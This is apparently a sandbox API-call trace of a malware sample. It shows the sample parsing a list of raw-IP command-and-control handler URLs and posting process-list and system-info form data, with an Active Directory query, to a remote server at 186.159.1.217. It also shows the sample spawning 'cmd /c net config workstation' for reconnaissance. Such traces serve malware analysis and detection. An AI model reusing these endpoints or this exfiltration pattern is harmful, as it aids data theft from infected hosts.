	[0226.259] GetProcessHeap () returned 0x340000
	[0226.259] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x360d70
	[0226.259] lstrlenW (lpString="ttps://") returned 7
	[0226.259] lstrlenW (lpString="//") returned 2
	[0226.260] lstrlenW (lpString="") returned 0
	[0226.260] _wtoi (_String="80") returned 80
	[0226.260] lstrcpynW (in: lpString1=0x360d74, lpString2="200.21.51.30:80", iMaxLength=13 | out: lpString1="200.21.51.30") returned="200.21.51.30"
	[0226.260] lstrlenW (lpString="handler>") returned 8
	[0226.260] lstrlenW (lpString="/handler>") returned 9
	[0226.260] lstrcpynW (in: lpString1=0x19f450, lpString2="http://191.103.252.29:80</handler>\r\n<handler>http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=25 | out: lpString1="http://191.103.252.29:80") returned="http://191.103.252.29:80"
	[0226.260] GetProcessHeap () returned 0x340000
	[0226.260] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x361588
	[0226.260] lstrlenW (lpString="ttps://") returned 7
	[0226.260] lstrlenW (lpString="//") returned 2
	[0226.260] lstrlenW (lpString="") returned 0
	[0226.260] _wtoi (_String="80") returned 80
	[0226.260] lstrcpynW (in: lpString1=0x36158c, lpString2="191.103.252.29:80", iMaxLength=15 | out: lpString1="191.103.252.29") returned="191.103.252.29"
	[0226.260] lstrlenW (lpString="handler>") returned 8
	[0226.260] lstrlenW (lpString="/handler>") returned 9
	[0226.260] lstrcpynW (in: lpString1=0x19f450, lpString2="http://200.35.47.199:80</handler>\r\n<handler>http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=24 | out: lpString1="http://200.35.47.199:80") returned="http://200.35.47.199:80"
	[0226.260] GetProcessHeap () returned 0x340000
	[0226.260] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x361da0
	[0226.260] lstrlenW (lpString="ttps://") returned 7
	[0226.260] lstrlenW (lpString="//") returned 2
	[0226.260] lstrlenW (lpString="") returned 0
	[0226.260] _wtoi (_String="80") returned 80
	[0226.260] lstrcpynW (in: lpString1=0x361da4, lpString2="200.35.47.199:80", iMaxLength=14 | out: lpString1="200.35.47.199") returned="200.35.47.199"
	[0226.260] lstrlenW (lpString="handler>") returned 8
	[0226.260] lstrlenW (lpString="/handler>") returned 9
	[0226.260] lstrcpynW (in: lpString1=0x19f450, lpString2="http://190.152.125.162:80</handler>\r\n<handler>http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=26 | out: lpString1="http://190.152.125.162:80") returned="http://190.152.125.162:80"
	[0226.260] GetProcessHeap () returned 0x340000
	[0226.260] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x3625b8
	[0226.260] lstrlenW (lpString="ttps://") returned 7
	[0226.260] lstrlenW (lpString="//") returned 2
	[0226.260] lstrlenW (lpString="") returned 0
	[0226.260] _wtoi (_String="80") returned 80
	[0226.260] lstrcpynW (in: lpString1=0x3625bc, lpString2="190.152.125.162:80", iMaxLength=16 | out: lpString1="190.152.125.162") returned="190.152.125.162"
	[0226.260] lstrlenW (lpString="handler>") returned 8
	[0226.260] lstrlenW (lpString="/handler>") returned 9
	[0226.260] lstrcpynW (in: lpString1=0x19f450, lpString2="http://194.5.250.44:443</handler>\r\n<handler>http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=24 | out: lpString1="http://194.5.250.44:443") returned="http://194.5.250.44:443"
	[0226.260] GetProcessHeap () returned 0x340000
	[0226.260] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x362dd0
	[0226.260] lstrlenW (lpString="ttps://") returned 7
	[0226.261] lstrlenW (lpString="//") returned 2
	[0226.261] lstrlenW (lpString="") returned 0
	[0226.261] _wtoi (_String="443") returned 443
	[0226.261] lstrcpynW (in: lpString1=0x362dd4, lpString2="194.5.250.44:443", iMaxLength=13 | out: lpString1="194.5.250.44") returned="194.5.250.44"
	[0226.261] lstrlenW (lpString="handler>") returned 8
	[0226.261] lstrlenW (lpString="/handler>") returned 9
	[0226.261] lstrcpynW (in: lpString1=0x19f450, lpString2="http://85.209.162.203:443</handler>\r\n<handler>http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=26 | out: lpString1="http://85.209.162.203:443") returned="http://85.209.162.203:443"
	[0226.261] GetProcessHeap () returned 0x340000
	[0226.261] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x3635e8
	[0226.261] lstrlenW (lpString="ttps://") returned 7
	[0226.261] lstrlenW (lpString="//") returned 2
	[0226.261] lstrlenW (lpString="") returned 0
	[0226.261] _wtoi (_String="443") returned 443
	[0226.261] lstrcpynW (in: lpString1=0x3635ec, lpString2="85.209.162.203:443", iMaxLength=15 | out: lpString1="85.209.162.203") returned="85.209.162.203"
	[0226.261] lstrlenW (lpString="handler>") returned 8
	[0226.261] lstrlenW (lpString="/handler>") returned 9
	[0226.261] lstrcpynW (in: lpString1=0x19f450, lpString2="http://194.5.250.130:443</handler>\r\n<handler>http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=25 | out: lpString1="http://194.5.250.130:443") returned="http://194.5.250.130:443"
	[0226.261] GetProcessHeap () returned 0x340000
	[0226.261] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x363e00
	[0226.261] lstrlenW (lpString="ttps://") returned 7
	[0226.261] lstrlenW (lpString="//") returned 2
	[0226.261] lstrlenW (lpString="") returned 0
	[0226.261] _wtoi (_String="443") returned 443
	[0226.261] lstrcpynW (in: lpString1=0x363e04, lpString2="194.5.250.130:443", iMaxLength=14 | out: lpString1="194.5.250.130") returned="194.5.250.130"
	[0226.261] lstrlenW (lpString="handler>") returned 8
	[0226.261] lstrlenW (lpString="/handler>") returned 9
	[0226.261] lstrcpynW (in: lpString1=0x19f450, lpString2="http://192.210.152.190:443</handler>\r\n<handler>http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=27 | out: lpString1="http://192.210.152.190:443") returned="http://192.210.152.190:443"
	[0226.261] GetProcessHeap () returned 0x340000
	[0226.261] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x364618
	[0226.261] lstrlenW (lpString="ttps://") returned 7
	[0226.261] lstrlenW (lpString="//") returned 2
	[0226.261] lstrlenW (lpString="") returned 0
	[0226.261] _wtoi (_String="443") returned 443
	[0226.261] lstrcpynW (in: lpString1=0x36461c, lpString2="192.210.152.190:443", iMaxLength=16 | out: lpString1="192.210.152.190") returned="192.210.152.190"
	[0226.261] lstrlenW (lpString="handler>") returned 8
	[0226.261] lstrlenW (lpString="/handler>") returned 9
	[0226.261] lstrcpynW (in: lpString1=0x19f450, lpString2="http://194.5.250.140:443</handler>\r\n<handler>http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=25 | out: lpString1="http://194.5.250.140:443") returned="http://194.5.250.140:443"
	[0226.261] GetProcessHeap () returned 0x340000
	[0226.261] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x364e30
	[0226.262] lstrlenW (lpString="ttps://") returned 7
	[0226.262] lstrlenW (lpString="//") returned 2
	[0226.262] lstrlenW (lpString="") returned 0
	[0226.262] _wtoi (_String="443") returned 443
	[0226.262] lstrcpynW (in: lpString1=0x364e34, lpString2="194.5.250.140:443", iMaxLength=14 | out: lpString1="194.5.250.140") returned="194.5.250.140"
	[0226.262] lstrlenW (lpString="handler>") returned 8
	[0226.262] lstrlenW (lpString="/handler>") returned 9
	[0226.262] lstrcpynW (in: lpString1=0x19f450, lpString2="http://89.46.223.252:443</handler>\r\n</dpost>\r\n", iMaxLength=25 | out: lpString1="http://89.46.223.252:443") returned="http://89.46.223.252:443"
	[0226.262] GetProcessHeap () returned 0x340000
	[0226.262] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x810) returned 0x365648
	[0226.262] lstrlenW (lpString="ttps://") returned 7
	[0226.262] lstrlenW (lpString="//") returned 2
	[0226.262] lstrlenW (lpString="") returned 0
	[0226.262] _wtoi (_String="443") returned 443
	[0226.262] lstrcpynW (in: lpString1=0x36564c, lpString2="89.46.223.252:443", iMaxLength=14 | out: lpString1="89.46.223.252") returned="89.46.223.252"
	[0226.262] lstrlenW (lpString="handler>") returned 8
	[0226.262] GetProcessHeap () returned 0x340000
	[0226.262] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x35d700 | out: hHeap=0x340000) returned 1
	[0226.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x10003680, lpParameter=0x35d6f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c
	[0226.262] ResetEvent (hEvent=0x8) returned 1
	[0226.262] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) 

Thread:
	id = 286
	os_tid = 0xb58

	[0226.263] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0226.267] _vsnwprintf_s (in: _Buffer=0x7af22c, _BufferCount=0x400, _MaxCount=0x3ff, _Format="--%s\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n", _ArgList=0x7afa3c | out: _Buffer="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n") returned 65
	[0226.267] lstrlenW (lpString="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\n") returned 65
	[0226.267] GetProcessHeap () returned 0x340000
	[0226.267] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x82) returned 0x35db78
	[0226.267] _vsnwprintf_s (in: _Buffer=0x7af230, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Empty\r\n", _ArgList=0x7afa40 | out: _Buffer="Empty\r\n") returned 7
	[0226.267] lstrlenW (lpString="Empty\r\n") returned 7
	[0226.267] GetProcessHeap () returned 0x340000
	[0226.267] RtlReAllocateHeap (Heap=0x340000, Flags=0x8, Ptr=0x35db78, Size=0x90) returned 0x35db78
	[0226.267] _vsnwprintf_s (in: _Buffer=0x7af224, _BufferCount=0x400, _MaxCount=0x3ff, _Format="--%s\r\n", _ArgList=0x7afa34 | out: _Buffer="--Arasfjasu7\r\n") returned 14
	[0226.267] lstrlenW (lpString="--Arasfjasu7\r\n") returned 14
	[0226.267] GetProcessHeap () returned 0x340000
	[0226.267] RtlReAllocateHeap (Heap=0x340000, Flags=0x8, Ptr=0x35db78, Size=0xac) returned 0x35db78
	[0226.267] _vsnwprintf_s (in: _Buffer=0x7af230, _BufferCount=0x400, _MaxCount=0x3ff, _Format="Content-Disposition: form-data; name=\"sysinfo\"\r\n\r\n", _ArgList=0x7afa40 | out: _Buffer="Content-Disposition: form-data; name=\"sysinfo\"\r\n\r\n") returned 50
	[0226.267] lstrlenW (lpString="Content-Disposition: form-data; name=\"sysinfo\"\r\n\r\n") returned 50
	[0226.267] GetProcessHeap () returned 0x340000
	[0226.267] RtlReAllocateHeap (Heap=0x340000, Flags=0x8, Ptr=0x35db78, Size=0x110) returned 0x35db78
	[0226.267] IIDFromString (in: lpsz="{001677D0-FD16-11CE-ABC4-02608C9E7553}", lpiid=0x7afa04 | out: lpiid=0x7afa04) returned 0x0
	[0226.267] ADsOpenObject (lpszPathName="GC:", lpszUserName=0x0, lpszPassword=0x0, dwReserved=0x1, riid=0x7afa04*(Data1=0x1677d0, Data2=0xfd16, Data3=0x11ce, Data4=([0]=0xab, [1]=0xc4, [2]=0x2, [3]=0x60, [4]=0x8c, [5]=0x9e, [6]=0x75, [7]=0x53)), ppObject=0x7afa1c*=0x0) returned 0x0
	[0226.593] IIDFromString (in: lpsz="{00020404-0000-0000-C000-000000000046}", lpiid=0x7afa04 | out: lpiid=0x7afa04) returned 0x0
	[0226.607] _vsnwprintf_s (in: _Buffer=0x7af224, _BufferCount=0x400, _MaxCount=0x3ff, _Format="--%s--\r\n\r\n", _ArgList=0x7afa34 | out: _Buffer="--Arasfjasu7--\r\n\r\n") returned 18
	[0226.607] lstrlenW (lpString="--Arasfjasu7--\r\n\r\n") returned 18
	[0226.607] GetProcessHeap () returned 0x340000
	[0226.607] RtlReAllocateHeap (Heap=0x340000, Flags=0x8, Ptr=0x35db78, Size=0x134) returned 0x37b1a0
	[0226.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n", cchWideChar=154, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 154
	[0226.607] GetProcessHeap () returned 0x340000
	[0226.607] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x9a) returned 0x35db78
	[0226.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\n", cchWideChar=154, lpMultiByteStr=0x35db78, cbMultiByte=154, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="--Arasfjasu7\r\nContent-Disposition: form-data; name=\"proclist\"\r\n\r\nEmpty\r\n--Arasfjasu7\r\nContent-Disposition: form-data; name=\"sysinfo\"\r\n\r\n--Arasfjasu7--\r\n\r\ns", lpUsedDefaultChar=0x0) returned 154
	[0226.607] wsprintfW (in: param_1=0x7af580, param_2="/%s/%s/90" | out: param_1="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90") returned 60
	[0226.607] wsprintfW (in: param_1=0x7aed80, param_2="Content-Type: multipart/form-data; boundary=%s" | out: param_1="Content-Type: multipart/form-data; boundary=Arasfjasu7") returned 54
	[0226.607] InternetOpenW (lpszAgent="test", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0226.663] InternetConnectW (hInternet=0xcc0004, lpszServerName="186.159.1.217", nServerPort=0x1f92, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
	[0226.664] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x1) returned 0xcc000c
	[0226.665] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=Arasfjasu7", dwHeadersLength=0xffffffff, lpOptional=0x35db78*, dwOptionalLength=0x9a) returned 1
	[0227.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7af980, dwNumberOfBytesToRead=0x7f, lpdwNumberOfBytesRead=0x7afa0c | out: lpBuffer=0x7af980*, lpdwNumberOfBytesRead=0x7afa0c*=0x1a) returned 1
	[0227.379] ResetEvent (hEvent=0xc) returned 1
	[0227.379] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0228.403] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7af980, dwNumberOfBytesToRead=0x7f, lpdwNumberOfBytesRead=0x7afa0c | out: lpBuffer=0x7af980*, lpdwNumberOfBytesRead=0x7afa0c*=0x0) returned 1
	[0228.403] ResetEvent (hEvent=0xc) returned 1
	[0228.403] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0228.437] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0228.437] InternetCloseHandle (hInternet=0xcc0008) returned 0
	[0228.437] InternetCloseHandle (hInternet=0xcc000c) returned 0
	[0228.437] GetProcessHeap () returned 0x340000
	[0228.437] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x35dce0 | out: hHeap=0x340000) returned 1
	[0228.437] GetProcessHeap () returned 0x340000
	[0228.437] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x35e4f8 | out: hHeap=0x340000) returned 1
	[0228.437] GetProcessHeap () returned 0x340000
	[0228.437] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x35ed10 | out: hHeap=0x340000) returned 1
	[0228.437] GetProcessHeap () returned 0x340000
	[0228.437] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x35f528 | out: hHeap=0x340000) returned 1
	[0228.437] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x35fd40 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x360558 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x360d70 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x361588 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x361da0 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x3625b8 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x362dd0 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x3635e8 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x363e00 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x364618 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x364e30 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x365648 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x35d6f0 | out: hHeap=0x340000) returned 1
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x37b1a0 | out: hHeap=0x340000) returned 1
	[0228.438] CoUninitialize () 
	[0228.438] GetProcessHeap () returned 0x340000
	[0228.438] HeapFree (in: hHeap=0x340000, dwFlags=0x8, lpMem=0x35db78 | out: hHeap=0x340000) returned 1
	[0228.438] RtlExitUserThread (Status=0x0) 

Thread:
	id = 287
	os_tid = 0xb68


Thread:
	id = 288
	os_tid = 0xb7c


Thread:
	id = 289
	os_tid = 0xb80


Thread:
	id = 290
	os_tid = 0xbfc


Thread:
	id = 291
	os_tid = 0xc04


Thread:
	id = 292
	os_tid = 0xa04


Thread:
	id = 308
	os_tid = 0xd40


Process:
	id = "46"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee17200"
	os_pid = "0x3e4"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "45"
	os_parent_pid = "0xb28"
	cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Local Service"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c042" [0xc000000f], "LOCAL" [0x7]


Thread:
	id = 293
	os_tid = 0xb3c


Thread:
	id = 294
	os_tid = 0x7ac


Thread:
	id = 295
	os_tid = 0x55c


Thread:
	id = 296
	os_tid = 0x9d8


Thread:
	id = 297
	os_tid = 0xe94


Thread:
	id = 298
	os_tid = 0x72c


Thread:
	id = 299
	os_tid = 0x728


Thread:
	id = 300
	os_tid = 0x700


Thread:
	id = 301
	os_tid = 0x6f0


Thread:
	id = 302
	os_tid = 0x6ec


Thread:
	id = 303
	os_tid = 0x408


Thread:
	id = 304
	os_tid = 0x404


Thread:
	id = 305
	os_tid = 0x3f4


Thread:
	id = 306
	os_tid = 0x3e8


Thread:
	id = 307
	os_tid = 0xa00


Process:
	id = "47"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee173e0"
	os_pid = "0xa50"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "40"
	os_parent_pid = "0xa70"
	cmd_line = "/c net config workstation"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 312
	os_tid = 0x318

	[0228.609] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afd9c | out: lpSystemTimeAsFileTime=0x1afd9c*(dwLowDateTime=0x7049f5a0, dwHighDateTime=0x1d50a6a)) 
	[0228.609] GetCurrentProcessId () returned 0xa50
	[0228.609] GetCurrentThreadId () returned 0x318
	[0228.609] GetTickCount () returned 0xa8f5d6
	[0228.609] QueryPerformanceCounter (in: lpPerformanceCount=0x1afd94 | out: lpPerformanceCount=0x1afd94*=30244665706) returned 1
	[0228.609] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3c0000
	[0228.609] __set_app_type (_Type=0x1) 
	[0228.609] __p__fmode () returned 0x770231f4
	[0228.609] __p__commode () returned 0x770231fc
	[0228.609] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3e21a6) returned 0x0
	[0228.610] __getmainargs (in: _Argc=0x4a3e4238, _Argv=0x4a3e4240, _Env=0x4a3e423c, _DoWildCard=0, _StartInfo=0x4a3e4140 | out: _Argc=0x4a3e4238, _Argv=0x4a3e4240, _Env=0x4a3e423c) returned 0
	[0228.610] GetCurrentThreadId () returned 0x318
	[0228.610] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x318) returned 0x38
	[0228.610] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0228.610] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0228.610] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0228.610] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0228.610] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afd2c | out: phkResult=0x1afd2c*=0x0) returned 0x2
	[0228.610] VirtualQuery (in: lpAddress=0x1afd63, lpBuffer=0x1afcfc, dwLength=0x1c | out: lpBuffer=0x1afcfc*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0228.610] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afcfc, dwLength=0x1c | out: lpBuffer=0x1afcfc*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0228.610] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afcfc, dwLength=0x1c | out: lpBuffer=0x1afcfc*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0228.610] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afcfc, dwLength=0x1c | out: lpBuffer=0x1afcfc*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0228.610] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afcfc, dwLength=0x1c | out: lpBuffer=0x1afcfc*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0228.610] GetConsoleOutputCP () returned 0x1b5
	[0228.611] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3e4260 | out: lpCPInfo=0x4a3e4260) returned 1
	[0228.611] SetConsoleCtrlHandler (HandlerRoutine=0x4a3de72a, Add=1) returned 1
	[0228.611] _get_osfhandle (_FileHandle=1) returned 0x15c
	[0228.611] SetConsoleMode (hConsoleHandle=0x15c, dwMode=0x0) returned 0
	[0228.611] _get_osfhandle (_FileHandle=1) returned 0x15c
	[0228.611] GetConsoleMode (in: hConsoleHandle=0x15c, lpMode=0x4a3e41ac | out: lpMode=0x4a3e41ac) returned 0
	[0228.611] _get_osfhandle (_FileHandle=0) returned 0x150
	[0228.611] GetConsoleMode (in: hConsoleHandle=0x150, lpMode=0x4a3e41b0 | out: lpMode=0x4a3e41b0) returned 0
	[0228.611] GetEnvironmentStringsW () returned 0x2e01d0*
	[0228.611] GetProcessHeap () returned 0x2d0000
	[0228.611] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8fa) returned 0x2e0ad8
	[0228.611] FreeEnvironmentStringsW (penv=0x2e01d0) returned 1
	[0228.611] GetProcessHeap () returned 0x2d0000
	[0228.611] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4) returned 0x2e0050
	[0228.611] GetEnvironmentStringsW () returned 0x2e01d0*
	[0228.611] GetProcessHeap () returned 0x2d0000
	[0228.611] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8fa) returned 0x2e13e0
	[0228.611] FreeEnvironmentStringsW (penv=0x2e01d0) returned 1
	[0228.611] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec9c | out: phkResult=0x1aec9c*=0x40) returned 0x0
